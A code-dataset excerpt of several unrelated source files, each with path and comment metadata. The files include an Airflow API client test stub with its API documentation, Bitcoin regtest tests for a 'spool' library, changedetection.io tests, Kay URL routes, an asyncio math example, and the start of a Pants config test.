## BadRequest This response means that the server cannot or will not process the request due to something that is perceived to be a airflow_client.client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing). To resolve this, please ensure that your syntax is correct. ## NotFound This airflow_client.client error response indicates that the server cannot find the requested resource. ## MethodNotAllowed Indicates that the request method is known by the server but is not supported by the target resource. ## NotAcceptable The target resource does not have a current representation that would be acceptable to the user agent, according to the proactive negotiation header fields received in the request, and the server is unwilling to supply a default representation. ## AlreadyExists The request could not be completed due to a conflict with the current state of the target resource, e.g. the resource it tries to create already exists. ## Unknown This means that the server encountered an unexpected condition that prevented it from fulfilling the request. # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: dev@airflow.apache.org
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import airflow_client.client
from airflow_client.client.model.dag import DAG
globals()['DAG'] = DAG
from airflow_client.client.model.dag_collection_all_of import DAGCollectionAllOf
class TestDAGCollectionAllOf(unittest.TestCase):
"""DAGCollectionAllOf unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testDAGCollectionAllOf(self):
"""Test DAGCollectionAllOf"""
# FIXME: construct object with mandatory attributes with example values
# model = DAGCollectionAllOf() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| airflow_client/test/test_dag_collection_all_of.py | 8,993 | DAGCollectionAllOf unit test stubs
Test DAGCollectionAllOf
Airflow API (Stable)
# Overview To facilitate management, Apache Airflow supports a range of REST API endpoints across its objects. This section provides an overview of the API design, methods, and supported use cases. Most of the endpoints accept `JSON` as input and return `JSON` responses. This means that you must usually add the following headers to your request: ``` Content-type: application/json Accept: application/json ``` ## Resources The term `resource` refers to a single type of object in the Airflow metadata. An API is broken up by its endpoint's corresponding resource. The name of a resource is typically plural and expressed in camelCase. Example: `dagRuns`. Resource names are used as part of endpoint URLs, as well as in API parameters and responses. ## CRUD Operations The platform supports **C**reate, **R**ead, **U**pdate, and **D**elete operations on most resources. You can review the standards for these operations and their standard parameters below. Some endpoints have special behavior as exceptions. ### Create To create a resource, you typically submit an HTTP `POST` request with the resource's required metadata in the request body. The response returns a `201 Created` response code upon success with the resource's metadata, including its internal `id`, in the response body. ### Read The HTTP `GET` request can be used to read a resource or to list a number of resources. A resource's `id` can be submitted in the request parameters to read a specific resource. The response usually returns a `200 OK` response code upon success, with the resource's metadata in the response body. If a `GET` request does not include a specific resource `id`, it is treated as a list request. The response usually returns a `200 OK` response code upon success, with an object containing a list of resources' metadata in the response body. When reading resources, some common query parameters are usually available. e.g.: ``` v1/connections?limit=25&offset=25 ``` |Query Parameter|Type|Description| |---------------|----|-----------| |limit|integer|Maximum number of objects to fetch. Usually 25 by default| |offset|integer|Offset after which to start returning objects. For use with limit query parameter.| ### Update Updating a resource requires the resource `id`, and is typically done using an HTTP `PATCH` request, with the fields to modify in the request body. The response usually returns a `200 OK` response code upon success, with information about the modified resource in the response body. ### Delete Deleting a resource requires the resource `id` and is typically executing via an HTTP `DELETE` request. The response usually returns a `204 No Content` response code upon success. ## Conventions - Resource names are plural and expressed in camelCase. - Names are consistent between URL parameter name and field name. - Field names are in snake_case. ```json { "name": "string", "slots": 0, "occupied_slots": 0, "used_slots": 0, "queued_slots": 0, "open_slots": 0 } ``` ### Update Mask Update mask is available as a query parameter in patch endpoints. It is used to notify the API which fields you want to update. Using `update_mask` makes it easier to update objects by helping the server know which fields to update in an object instead of updating all fields. The update request ignores any fields that aren't specified in the field mask, leaving them with their current values. 
Example: ``` resource = request.get('/resource/my-id').json() resource['my_field'] = 'new-value' request.patch('/resource/my-id?update_mask=my_field', data=json.dumps(resource)) ``` ## Versioning and Endpoint Lifecycle - API versioning is not synchronized to specific releases of the Apache Airflow. - APIs are designed to be backward compatible. - Any changes to the API will first go through a deprecation phase. # Summary of Changes | Airflow version | Description | |-|-| | v2.0 | Initial release | | v2.0.2 | Added /plugins endpoint | | v2.1 | New providers endpoint | # Trying the API You can use a third party airflow_client.client, such as [curl](https://curl.haxx.se/), [HTTPie](https://httpie.org/), [Postman](https://www.postman.com/) or [the Insomnia rest airflow_client.client](https://insomnia.rest/) to test the Apache Airflow API. Note that you will need to pass credentials data. For e.g., here is how to pause a DAG with [curl](https://curl.haxx.se/), when basic authorization is used: ```bash curl -X PATCH 'https://example.com/api/v1/dags/{dag_id}?update_mask=is_paused' \ -H 'Content-Type: application/json' \ --user "username:password" \ -d '{ "is_paused": true }' ``` Using a graphical tool such as [Postman](https://www.postman.com/) or [Insomnia](https://insomnia.rest/), it is possible to import the API specifications directly: 1. Download the API specification by clicking the **Download** button at top of this document 2. Import the JSON specification in the graphical tool of your choice. - In *Postman*, you can click the **import** button at the top - With *Insomnia*, you can just drag-and-drop the file on the UI Note that with *Postman*, you can also generate code snippets by selecting a request and clicking on the **Code** button. ## Enabling CORS [Cross-origin resource sharing (CORS)](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) is a browser security feature that restricts HTTP requests that are initiated from scripts running in the browser. For details on enabling/configuring CORS, see [Enabling CORS](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html). # Authentication To be able to meet the requirements of many organizations, Airflow supports many authentication methods, and it is even possible to add your own method. If you want to check which auth backend is currently set, you can use `airflow config get-value api auth_backend` command as in the example below. ```bash $ airflow config get-value api auth_backend airflow.api.auth.backend.basic_auth ``` The default is to deny all requests. For details on configuring the authentication, see [API Authorization](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html). # Errors We follow the error response format proposed in [RFC 7807](https://tools.ietf.org/html/rfc7807) also known as Problem Details for HTTP APIs. As with our normal API responses, your airflow_client.client must be prepared to gracefully handle additional members of the response. ## Unauthenticated This indicates that the request has not been applied because it lacks valid authentication credentials for the target resource. Please check that you have valid credentials. ## PermissionDenied This response means that the server understood the request but refuses to authorize it because it lacks sufficient rights to the resource. It happens when you do not have the necessary permission to execute the action you performed. You need to get the appropriate permissions in other to resolve this error. 
## BadRequest This response means that the server cannot or will not process the request due to something that is perceived to be a airflow_client.client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing). To resolve this, please ensure that your syntax is correct. ## NotFound This airflow_client.client error response indicates that the server cannot find the requested resource. ## MethodNotAllowed Indicates that the request method is known by the server but is not supported by the target resource. ## NotAcceptable The target resource does not have a current representation that would be acceptable to the user agent, according to the proactive negotiation header fields received in the request, and the server is unwilling to supply a default representation. ## AlreadyExists The request could not be completed due to a conflict with the current state of the target resource, e.g. the resource it tries to create already exists. ## Unknown This means that the server encountered an unexpected condition that prevented it from fulfilling the request. # noqa: E501
The version of the OpenAPI document: 1.0.0
Contact: dev@airflow.apache.org
Generated by: https://openapi-generator.tech
FIXME: construct object with mandatory attributes with example values model = DAGCollectionAllOf() noqa: E501 | 8,464 | en | 0.839024 |
# -*- coding: utf-8 -*-
from __future__ import division, unicode_literals
from __future__ import absolute_import
from uuid import uuid1
from datetime import datetime
import pytest
import pytz
from pycoin.key.BIP32Node import BIP32Node
from transactions import Transactions
from transactions.services.daemonservice import BitcoinDaemonService
def test_blockchainspider_init(rpcuser, rpcpassword, host, port):
from spool.spoolex import BlockchainSpider
blockchain_spider = BlockchainSpider(
testnet=True,
service='daemon',
username=rpcuser,
password=rpcpassword,
host=host,
port=port,
)
assert isinstance(blockchain_spider._t, Transactions)
assert blockchain_spider._t.testnet is True
assert blockchain_spider._t._service._username == rpcuser
assert blockchain_spider._t._service._password == rpcpassword
assert blockchain_spider._t._service._host == host
assert blockchain_spider._t._service._port == port
assert isinstance(blockchain_spider._t._service, BitcoinDaemonService)
@pytest.mark.usefixtures('init_blockchain')
def test_check_script(rpconn, piece_hashes, spool_regtest, transactions):
"""
Test :staticmethod:`check_script`.
    Args:
alice (str): bitcoin address of alice, the sender
bob (str): bitcoin address of bob, the receiver
rpconn (AuthServiceProxy): JSON-RPC connection
(:class:`AuthServiceProxy` instance) to bitcoin regtest
transactions (Transactions): :class:`Transactions` instance to
communicate to the bitcoin regtest node
"""
from spool import Spool
from spool.spoolex import BlockchainSpider
sender_password = uuid1().hex.encode('utf-8')
sender_wallet = BIP32Node.from_master_secret(sender_password,
netcode='XTN')
sender_address = sender_wallet.bitcoin_address()
rpconn.importaddress(sender_address)
rpconn.sendtoaddress(sender_address, Spool.FEE/100000000)
rpconn.sendtoaddress(sender_address, Spool.TOKEN/100000000)
rpconn.sendtoaddress(sender_address, Spool.TOKEN/100000000)
rpconn.sendtoaddress(sender_address, Spool.TOKEN/100000000)
rpconn.generate(1)
receiver_address = rpconn.getnewaddress()
# TODO do not rely on Spool
txid = spool_regtest.transfer(
('', sender_address),
receiver_address,
piece_hashes,
sender_password,
5,
min_confirmations=1,
)
verb = BlockchainSpider.check_script(transactions.get(txid)['vouts'])
assert verb == b'ASCRIBESPOOL01TRANSFER5'
@pytest.mark.usefixtures('init_blockchain')
def test_check_script_with_invalid_tx(eve, wendy, rpconn, transactions):
"""
An invalid transaction in this context is one that does not contain a
``vout`` for which the ``hex`` is a valid ``Spool`` verb.
    Args:
eve (str): bitcoin address of eve, the sender
wendy (str): bitcoin address of wendy, the receiver
rpconn (AuthServiceProxy): JSON-RPC connection
(:class:`AuthServiceProxy` instance) a local bitcoin regtest
transactions (Transactions): :class:`Transactions` instance to
communicate to the bitcoin regtest node
"""
from spool.spoolex import BlockchainSpider
rpconn.sendtoaddress(eve, 2)
rpconn.generate(1)
txid = rpconn.sendfrom('eve', wendy, 1)
decoded_raw_transfer_tx = transactions.get(txid)
with pytest.raises(Exception) as exc:
BlockchainSpider.check_script(decoded_raw_transfer_tx['vouts'])
assert exc.value.args[0] == 'Invalid ascribe transaction'
@pytest.mark.usefixtures('init_blockchain')
def test_get_addresses(rpconn, piece_hashes, spool_regtest, transactions):
from spool import Spool
from spool.spoolex import BlockchainSpider
sender_password = uuid1().hex.encode('utf-8')
sender_wallet = BIP32Node.from_master_secret(sender_password,
netcode='XTN')
sender_address = sender_wallet.bitcoin_address()
rpconn.importaddress(sender_address)
rpconn.sendtoaddress(sender_address, Spool.FEE/100000000)
rpconn.sendtoaddress(sender_address, Spool.TOKEN/100000000)
rpconn.sendtoaddress(sender_address, Spool.TOKEN/100000000)
rpconn.sendtoaddress(sender_address, Spool.TOKEN/100000000)
rpconn.generate(1)
receiver_address = rpconn.getnewaddress()
# TODO do not rely on Spool
txid = spool_regtest.transfer(
('', sender_address),
receiver_address,
piece_hashes,
sender_password,
5,
min_confirmations=1,
)
decoded_raw_transfer_tx = transactions.get(txid)
addresses = BlockchainSpider._get_addresses(decoded_raw_transfer_tx)
assert len(addresses) == 3
assert addresses[0] == sender_address
assert addresses[1] == receiver_address
assert addresses[2] == piece_hashes[0]
@pytest.mark.usefixtures('init_blockchain')
def test_get_addresses_with_invalid_tx(eve, wendy, rpconn, transactions):
"""
An invalid transaction in this context is one that has inputs from
different addresses.
    Args:
eve (str): bitcoin address of eve, the sender
wendy (str): bitcoin address of wendy, the receiver
rpconn (AuthServiceProxy): JSON-RPC connection
(:class:`AuthServiceProxy` instance) a local bitcoin regtest
transactions (Transactions): :class:`Transactions` instance to
communicate to the bitcoin regtest node
"""
from spool.spoolex import BlockchainSpider, InvalidTransactionError
rpconn.sendtoaddress(eve, 1)
rpconn.sendtoaddress(eve, 1)
rpconn.generate(1)
txid = rpconn.sendfrom('eve', wendy, 2)
decoded_raw_transfer_tx = transactions.get(txid)
with pytest.raises(InvalidTransactionError) as exc:
BlockchainSpider._get_addresses(decoded_raw_transfer_tx)
assert isinstance(exc.value, InvalidTransactionError)
def test_decode_op_return():
from spool.spoolex import BlockchainSpider
op_return_hex = '6a174153435249424553504f4f4c30315452414e5346455235'
op_return = BlockchainSpider.decode_op_return(op_return_hex)
assert op_return == b'ASCRIBESPOOL01TRANSFER5'
def test_get_time_utc():
from spool.spoolex import BlockchainSpider, TIME_FORMAT
time = '2016-06-13T17:28:03 UTC'
timestamp = BlockchainSpider._get_time_utc(time)
assert timestamp
assert datetime.fromtimestamp(timestamp,
tz=pytz.UTC).strftime(TIME_FORMAT) == time
def test_simplest_history(federation, alice, piece_hashes,
spool_regtest, spider, rpconn):
txid = spool_regtest.register_piece(
('', federation),
alice,
piece_hashes,
b'federation-secret',
min_confirmations=1,
)
rpconn.generate(1)
history = spider.history(piece_hashes[0])
assert len(history) == 1
assert '' in history
assert len(history['']) == 1
piece_registration_data = history[''][0]
assert piece_registration_data['action'] == 'PIECE'
assert piece_registration_data['edition_number'] == ''
assert piece_registration_data['from_address'] == federation
assert piece_registration_data['number_editions'] == 0
assert piece_registration_data['piece_address'] == piece_hashes[0]
assert piece_registration_data['timestamp_utc']
assert piece_registration_data['to_address'] == alice
assert piece_registration_data['txid'] == txid
assert piece_registration_data['verb'] == b'ASCRIBESPOOL01PIECE'
def test_register_editions_qty_history(federation,
alice,
registered_piece_hashes,
spool_regtest,
spider,
rpconn):
txid = spool_regtest.editions(
('', federation),
alice,
registered_piece_hashes,
b'federation-secret',
3,
min_confirmations=1,
)
rpconn.generate(1)
history = spider.history(registered_piece_hashes[0])
assert len(history) == 2
assert '' in history
assert 0 in history
assert len(history['']) == 1
assert len(history[0]) == 1
editions_data = history[0][0]
assert editions_data['action'] == 'EDITIONS'
assert editions_data['edition_number'] == 0
assert editions_data['from_address'] == federation
assert editions_data['number_editions'] == 3
assert editions_data['piece_address'] == registered_piece_hashes[0]
assert editions_data['timestamp_utc']
assert editions_data['to_address'] == alice
assert editions_data['txid'] == txid
assert editions_data['verb'] == b'ASCRIBESPOOL01EDITIONS3'
def test_register_edition_history(federation, alice, spool_regtest, spider,
registered_edition_qty_hashes, rpconn):
edition_number = 2
piece_hash = registered_edition_qty_hashes[0]
txid = spool_regtest.register(
('', federation),
alice,
registered_edition_qty_hashes,
b'federation-secret',
edition_number,
min_confirmations=1,
)
rpconn.generate(1)
history = spider.history(piece_hash)
assert len(history) == 3
assert '' in history
assert 0 in history
assert edition_number in history
assert len(history['']) == 1
assert len(history[0]) == 1
assert len(history[edition_number]) == 1
edition_registration_data = history[edition_number][0]
assert edition_registration_data['action'] == 'REGISTER'
assert edition_registration_data['edition_number'] == edition_number
assert edition_registration_data['from_address'] == federation
assert edition_registration_data['number_editions'] == 3
assert edition_registration_data['piece_address'] == piece_hash
assert edition_registration_data['timestamp_utc']
assert edition_registration_data['to_address'] == alice
assert edition_registration_data['txid'] == txid
assert edition_registration_data['verb'] == b'ASCRIBESPOOL01REGISTER2'
def test_transfer_history(federation, alice, bob, spool_regtest, spider,
registered_edition_two_hashes, rpconn):
from .conftest import reload_address
reload_address(alice, rpconn)
edition_number = 2
piece_hash = registered_edition_two_hashes[0]
txid = spool_regtest.transfer(
('', alice),
bob,
registered_edition_two_hashes,
b'alice-secret',
edition_number,
min_confirmations=1,
)
rpconn.generate(1)
history = spider.history(piece_hash)
assert len(history) == 3
assert '' in history
assert 0 in history
assert edition_number in history
assert len(history['']) == 1
assert len(history[0]) == 1
assert len(history[edition_number]) == 2
transfer_data = history[edition_number][1]
assert transfer_data['action'] == 'TRANSFER'
assert transfer_data['edition_number'] == edition_number
assert transfer_data['from_address'] == alice
assert transfer_data['number_editions'] == 3
assert transfer_data['piece_address'] == piece_hash
assert transfer_data['timestamp_utc']
assert transfer_data['to_address'] == bob
assert transfer_data['txid'] == txid
assert transfer_data['verb'] == b'ASCRIBESPOOL01TRANSFER2'
def test_loan_history(federation, bob, carol, spool_regtest, spider,
transferred_edition_two_hashes, rpconn):
from .conftest import reload_address
edition_number = 2
loan_start, loan_end = '171017', '181018'
piece_hash = transferred_edition_two_hashes[0]
reload_address(bob, rpconn)
txid = spool_regtest.loan(
('', bob),
carol,
transferred_edition_two_hashes,
b'bob-secret',
2,
loan_start,
loan_end,
min_confirmations=1,
)
rpconn.generate(1)
history = spider.history(piece_hash)
assert len(history) == 3
assert '' in history
assert 0 in history
assert edition_number in history
assert len(history['']) == 1
assert len(history[0]) == 1
assert len(history[edition_number]) == 3
loan_data = history[edition_number][2]
assert loan_data['action'] == 'LOAN'
assert loan_data['edition_number'] == edition_number
assert loan_data['from_address'] == bob
assert loan_data['number_editions'] == 3
assert loan_data['piece_address'] == piece_hash
assert loan_data['timestamp_utc']
assert loan_data['to_address'] == carol
assert loan_data['txid'] == txid
assert loan_data['verb'] == b'ASCRIBESPOOL01LOAN2/171017181018'
def test_chain(loaned_edition_two_hashes, spider):
from spool import BlockchainSpider
history = spider.history(loaned_edition_two_hashes[0])
chain = BlockchainSpider.chain(history, 2)
assert len(chain) == 3
assert chain[0]['action'] == 'REGISTER'
assert chain[1]['action'] == 'TRANSFER'
assert chain[2]['action'] == 'LOAN'
assert chain[0]['edition_number'] == 2
assert chain[1]['edition_number'] == 2
assert chain[2]['edition_number'] == 2
def test_strip_loan(loaned_edition_two_hashes, spider):
from spool import BlockchainSpider
history = spider.history(loaned_edition_two_hashes[0])
chain = BlockchainSpider.chain(history, 2)
assert len(chain) == 3
assert 'LOAN' in (tx['action'] for tx in chain)
chain = BlockchainSpider.strip_loan(chain)
assert len(chain) == 2
assert 'LOAN' not in (tx['action'] for tx in chain)
def test_pprint(transferred_edition_two_hashes, spider):
from spool import BlockchainSpider
history = spider.history(transferred_edition_two_hashes[0])
BlockchainSpider.pprint(history)
| tests/test_spoolex.py | 13,840 | Test :staticmethod:`check_script`.
Args;
alice (str): bitcoin address of alice, the sender
bob (str): bitcoin address of bob, the receiver
rpconn (AuthServiceProxy): JSON-RPC connection
(:class:`AuthServiceProxy` instance) to bitcoin regtest
transactions (Transactions): :class:`Transactions` instance to
communicate to the bitcoin regtest node
An invalid transaction in this context is one that does not contain a
``vout`` for which the ``hex`` is a valid ``Spool`` verb.
Args;
eve (str): bitcoin address of eve, the sender
wendy (str): bitcoin address of wendy, the receiver
rpconn (AuthServiceProxy): JSON-RPC connection
(:class:`AuthServiceProxy` instance) a local bitcoin regtest
transactions (Transactions): :class:`Transactions` instance to
communicate to the bitcoin regtest node
An invalid transaction in this context is one that has inputs from
different addresses.
Args;
eve (str): bitcoin address of eve, the sender
wendy (str): bitcoin address of wendy, the receiver
rpconn (AuthServiceProxy): JSON-RPC connection
(:class:`AuthServiceProxy` instance) a local bitcoin regtest
transactions (Transactions): :class:`Transactions` instance to
communicate to the bitcoin regtest node
-*- coding: utf-8 -*- TODO do not rely on Spool TODO do not rely on Spool | 1,365 | en | 0.693011 |
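test_decode_op_return above expects the hex script to decode to the Spool verb. The layout is ordinary Bitcoin script: 0x6a is the OP_RETURN opcode and the next byte (0x17 = 23) is the length of the pushed payload. A standalone sketch of that decoding, with no spool dependency:

```python
# Decode the OP_RETURN payload from the test above without the spool library.
op_return_hex = "6a174153435249424553504f4f4c30315452414e5346455235"
script = bytes.fromhex(op_return_hex)

assert script[0] == 0x6A             # OP_RETURN opcode
payload_len = script[1]              # 0x17 == 23 bytes pushed
payload = script[2:2 + payload_len]

assert payload == b"ASCRIBESPOOL01TRANSFER5"
print(payload.decode())              # ASCRIBESPOOL01TRANSFER5
```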
#!/usr/bin/python3
import time
from flask import url_for
from urllib.request import urlopen
from . util import set_original_response, set_modified_response, live_server_setup
sleep_time_for_fetch_thread = 3
# Basic test to check inscriptis is not adding return line chars, basically works etc
def test_inscriptus():
from inscriptis import get_text
html_content="<html><body>test!<br/>ok man</body></html>"
stripped_text_from_html = get_text(html_content)
assert stripped_text_from_html == 'test!\nok man'
def test_check_basic_change_detection_functionality(client, live_server):
set_original_response()
live_server_setup(live_server)
# Add our URL to the import page
res = client.post(
url_for("import_page"),
data={"urls": url_for('test_endpoint', _external=True)},
follow_redirects=True
)
assert b"1 Imported" in res.data
time.sleep(sleep_time_for_fetch_thread)
# Do this a few times.. ensures we don't accidentally set the status
for n in range(3):
client.get(url_for("api_watch_checknow"), follow_redirects=True)
# Give the thread time to pick it up
time.sleep(sleep_time_for_fetch_thread)
# It should report nothing found (no new 'unviewed' class)
res = client.get(url_for("index"))
assert b'unviewed' not in res.data
assert b'test-endpoint' in res.data
# Default no password set, this stuff should be always available.
assert b"SETTINGS" in res.data
assert b"BACKUP" in res.data
assert b"IMPORT" in res.data
#####################
# Check HTML conversion was detected and worked
res = client.get(
url_for("preview_page", uuid="first"),
follow_redirects=True
)
# Check this class does not appear (that we didn't see the actual source)
assert b'foobar-detection' not in res.data
# Make a change
set_modified_response()
res = urlopen(url_for('test_endpoint', _external=True))
assert b'which has this one new line' in res.read()
# Force recheck
res = client.get(url_for("api_watch_checknow"), follow_redirects=True)
assert b'1 watches are queued for rechecking.' in res.data
time.sleep(sleep_time_for_fetch_thread)
# Now something should be ready, indicated by having a 'unviewed' class
res = client.get(url_for("index"))
assert b'unviewed' in res.data
# #75, and it should be in the RSS feed
res = client.get(url_for("rss"))
expected_url = url_for('test_endpoint', _external=True)
assert b'<rss' in res.data
# re #16 should have the diff in here too
assert b'(into ) which has this one new line' in res.data
assert b'CDATA' in res.data
assert expected_url.encode('utf-8') in res.data
# Following the 'diff' link, it should no longer display as 'unviewed' even after we recheck it a few times
res = client.get(url_for("diff_history_page", uuid="first"))
assert b'Compare newest' in res.data
time.sleep(2)
# Do this a few times.. ensures we don't accidentally set the status
for n in range(2):
client.get(url_for("api_watch_checknow"), follow_redirects=True)
# Give the thread time to pick it up
time.sleep(sleep_time_for_fetch_thread)
# It should report nothing found (no new 'unviewed' class)
res = client.get(url_for("index"))
assert b'unviewed' not in res.data
assert b'head title' not in res.data # Should not be present because this is off by default
assert b'test-endpoint' in res.data
set_original_response()
# Enable auto pickup of <title> in settings
res = client.post(
url_for("settings_page"),
data={"extract_title_as_title": "1", "minutes_between_check": 180, 'fetch_backend': "html_requests"},
follow_redirects=True
)
client.get(url_for("api_watch_checknow"), follow_redirects=True)
time.sleep(sleep_time_for_fetch_thread)
res = client.get(url_for("index"))
assert b'unviewed' in res.data
# It should have picked up the <title>
assert b'head title' in res.data
#
# Cleanup everything
res = client.get(url_for("api_delete", uuid="all"), follow_redirects=True)
assert b'Deleted' in res.data
| changedetectionio/tests/test_backend.py | 4,279 | !/usr/bin/python3 Basic test to check inscriptus is not adding return line chars, basically works etc Add our URL to the import page Do this a few times.. ensures we dont accidently set the status Give the thread time to pick it up It should report nothing found (no new 'unviewed' class) Default no password set, this stuff should be always available. Check HTML conversion detected and workd Check this class does not appear (that we didnt see the actual source) Make a change Force recheck Now something should be ready, indicated by having a 'unviewed' class 75, and it should be in the RSS feed re 16 should have the diff in here too Following the 'diff' link, it should no longer display as 'unviewed' even after we recheck it a few times Do this a few times.. ensures we dont accidently set the status Give the thread time to pick it up It should report nothing found (no new 'unviewed' class) Should not be present because this is off by default Enable auto pickup of <title> in settings It should have picked up the <title> Cleanup everything | 1,051 | en | 0.9083 |
# -*- coding: utf-8 -*-
"""
kay.ext.gaema.urls
:Copyright: (c) 2009 Takashi Matsuo <tmatsuo@candit.jp>
All rights reserved.
:license: BSD, see LICENSE for more details.
"""
from kay.routing import (
ViewGroup, Rule
)
view_groups = [
ViewGroup(
Rule('/login/<service>', endpoint='login',
view='kay.ext.gaema.views.login'),
Rule('/logout/<service>', endpoint='logout',
view='kay.ext.gaema.views.logout'),
Rule('/marketplace_login/a/<domain>', endpoint='marketplace_login',
view='kay.ext.gaema.views.marketplace_login'),
Rule('/marketplace_logout/<domain>', endpoint='marketplace_logout',
view='kay.ext.gaema.views.marketplace_logout'),
Rule('/select_service/<targets>', endpoint='select_service',
view='kay.ext.gaema.views.select_service'),
)
]
| kay/ext/gaema/urls.py | 839 | kay.ext.gaema.urls
:Copyright: (c) 2009 Takashi Matsuo <tmatsuo@candit.jp>
All rights reserved.
:license: BSD, see LICENSE for more details.
-*- coding: utf-8 -*- | 186 | en | 0.54642 |
"""
Asyncio using Asyncio.Task to execute three math functions in parallel
"""
import asyncio
@asyncio.coroutine
def factorial(number):
f = 1
for i in range(2, number+1):
print("Asyncio.Task: Compute factorial(%s)" % (i))
yield from asyncio.sleep(1)
f *= i
print("Asyncio.Task - factorial(%s) = %s" % (number, f))
@asyncio.coroutine
def fibonacci(number):
a, b = 0, 1
for i in range(number):
print("Asyncio.Task: Compute fibonacci (%s)" % (i))
yield from asyncio.sleep(1)
a, b = b, a + b
print("Asyncio.Task - fibonacci(%s) = %s" % (number, a))
@asyncio.coroutine
def binomialCoeff(n, k):
result = 1
for i in range(1, k+1):
result = result * (n-i+1) / i
print("Asyncio.Task: Compute binomialCoeff (%s)" % (i))
yield from asyncio.sleep(1)
print("Asyncio.Task - binomialCoeff(%s , %s) = %s" % (n,k,result))
if __name__ == "__main__":
tasks = [asyncio.Task(factorial(10)),
asyncio.Task(fibonacci(10)),
asyncio.Task(binomialCoeff(20,10))]
loop = asyncio.get_event_loop()
loop.run_until_complete(asyncio.wait(tasks))
loop.close()
| Chapter 4/asyncio_Task.py | 1,178 | Asyncio using Asyncio.Task to execute three math function in parallel | 69 | en | 0.627545 |
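The recipe above uses the pre-3.8 generator-based coroutine style (@asyncio.coroutine with yield from), which has since been removed from asyncio. A sketch of the same run-three-tasks-in-parallel pattern with native coroutines, assuming Python 3.7+:

```python
# The same pattern with native async/await: three coroutines scheduled
# concurrently and awaited together via asyncio.gather.
import asyncio

async def factorial(number):
    f = 1
    for i in range(2, number + 1):
        print("Task: Compute factorial(%s)" % i)
        await asyncio.sleep(1)
        f *= i
    print("Task - factorial(%s) = %s" % (number, f))

async def fibonacci(number):
    a, b = 0, 1
    for i in range(number):
        print("Task: Compute fibonacci(%s)" % i)
        await asyncio.sleep(1)
        a, b = b, a + b
    print("Task - fibonacci(%s) = %s" % (number, a))

async def binomial_coeff(n, k):
    result = 1
    for i in range(1, k + 1):
        result = result * (n - i + 1) / i
        print("Task: Compute binomialCoeff(%s)" % i)
        await asyncio.sleep(1)
    print("Task - binomialCoeff(%s, %s) = %s" % (n, k, result))

async def main():
    await asyncio.gather(factorial(10), fibonacci(10), binomial_coeff(20, 10))

if __name__ == "__main__":
    asyncio.run(main())
```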
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import unittest
from dataclasses import dataclass
from textwrap import dedent
from typing import Dict
from pants.engine.fs import FileContent
from pants.option.config import Config, TomlSerializer
@dataclass(frozen=True)
class ConfigFile:
content: str
default_values: Dict
expected_options: Dict
FILE_1 = ConfigFile(
content=dedent(
"""
[DEFAULT]
name = "%(env.NAME)s"
answer = 42
scale = 1.2
path = "/a/b/%(answer)s"
embed = "%(path)s::%(name)s"
disclaimer = '''
Let it be known
that.'''
[a]
# TODO: once TOML releases its new version with support for heterogenous lists, we should be
# able to rewrite this to `[1, 2, 3, "%(answer)s"`. See
# https://github.com/toml-lang/toml/issues/665.
list = ["1", "2", "3", "%(answer)s"]
list2.add = [7, 8, 9]
list3.remove = ["x", "y", "z"]
[b]
preempt = true
[c]
name = "overridden_from_default"
interpolated_from_section = "%(name)s is interpolated"
recursively_interpolated_from_section = "%(interpolated_from_section)s (again)"
[d.dict_val]
# Make sure we don't misinterpret `add` and `remove` as list options.
add = 0
remove = 0
nested = { nested_key = 'foo' }
[list_merging]
list1 = []
list2 = [1, 2]
list3.add = [3, 4]
list4.remove = [5]
list5 = [6, 7]
"""
),
default_values={
"name": "foo",
"answer": 42,
"scale": 1.2,
"path": "/a/b/42",
"embed": "/a/b/42::foo",
"disclaimer": "Let it be known\nthat.",
},
expected_options={
"a": {"list": '["1", "2", "3", "42"]', "list2": "+[7, 8, 9]", "list3": '-["x", "y", "z"]'},
"b": {"preempt": "True"},
"c": {
"name": "overridden_from_default",
"interpolated_from_section": "overridden_from_default is interpolated",
"recursively_interpolated_from_section": "overridden_from_default is interpolated (again)",
},
"d": {"dict_val": "{'add': 0, 'remove': 0, 'nested': {'nested_key': 'foo'}"},
"list_merging": {
"list1": "[]",
"list2": "[1, 2]",
"list3": "+[3, 4]",
"list4": "-[5]",
"list5": "[6, 7]",
},
},
)
FILE_2 = ConfigFile(
content=dedent(
"""
[a]
fast = true
[b]
preempt = false
[d]
list.add = [0, 1]
list.remove = [8, 9]
[empty_section]
[list_merging]
list1 = [11, 22]
list2.add = [33]
list3.add = [8, 9]
list3.remove = [4, 55]
list4 = [66]
list6.add = [77, 88]
"""
),
default_values={},
expected_options={
"a": {"fast": "True"},
"b": {"preempt": "False"},
"d": {"list": "+[0, 1],-[8, 9]"},
"empty_section": {},
"list_merging": {
"list1": "[11, 22]",
"list2": "+[33]",
"list3": "+[8, 9],-[4, 55]",
"list4": "[66]",
"list6": "+[77, 88]",
},
},
)
def _setup_config() -> Config:
parsed_config = Config.load(
file_contents=[
FileContent("file1.toml", FILE_1.content.encode()),
FileContent("file2.toml", FILE_2.content.encode()),
],
seed_values={"buildroot": "fake_buildroot"},
env={"NAME": "foo"},
)
assert ["file1.toml", "file2.toml"] == parsed_config.sources()
return parsed_config
class ConfigTest(unittest.TestCase):
def setUp(self) -> None:
self.config = _setup_config()
self.default_seed_values = Config._determine_seed_values(
seed_values={"buildroot": "fake_buildroot"},
env={"NAME": "foo"},
)
self.expected_combined_values: dict[str, dict[str, list[str]]] = {
"a": {
"list": ['["1", "2", "3", "42"]'],
"list2": ["+[7, 8, 9]"],
"list3": ['-["x", "y", "z"]'],
"fast": ["True"],
},
"b": {"preempt": ["True", "False"]},
"c": {
"name": ["overridden_from_default"],
"interpolated_from_section": ["overridden_from_default is interpolated"],
"recursively_interpolated_from_section": [
"overridden_from_default is interpolated (again)"
],
},
"d": {
"dict_val": ["{'add': 0, 'remove': 0, 'nested': {'nested_key': 'foo'}}"],
"list": ["+[0, 1],-[8, 9]"],
},
"empty_section": {},
"list_merging": {
"list1": ["[]", "[11, 22]"],
"list2": ["[1, 2]", "+[33]"],
"list3": ["+[3, 4]", "+[8, 9],-[4, 55]"],
"list4": ["-[5]", "[66]"],
"list5": ["[6, 7]"],
